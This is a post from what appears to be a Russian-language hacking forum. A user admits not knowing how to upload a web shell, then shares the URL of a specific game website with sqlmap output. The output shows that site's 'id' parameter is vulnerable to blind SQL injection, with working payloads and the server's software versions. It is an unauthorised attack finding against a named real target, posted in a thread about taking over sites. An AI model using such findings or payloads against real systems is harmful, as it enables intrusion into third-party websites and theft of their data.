Показать сообщение отдельно

  #170  
Старый 06.10.2017, 18:54
SlipX
Новичок
Регистрация: 30.08.2013
Сообщений: 20
Провел на форуме:
6356

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  

Слабо шелл залить ?
К сожелению да, не так силен в этом незнаю с чего начать даж

Был бы кто научит)

http://www.sfgames.ru/gameS.php?id=232

Код:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=232 AND 5858=5858

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=232 AND SLEEP(5)
---
[18:55:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
 
Ответить с цитированием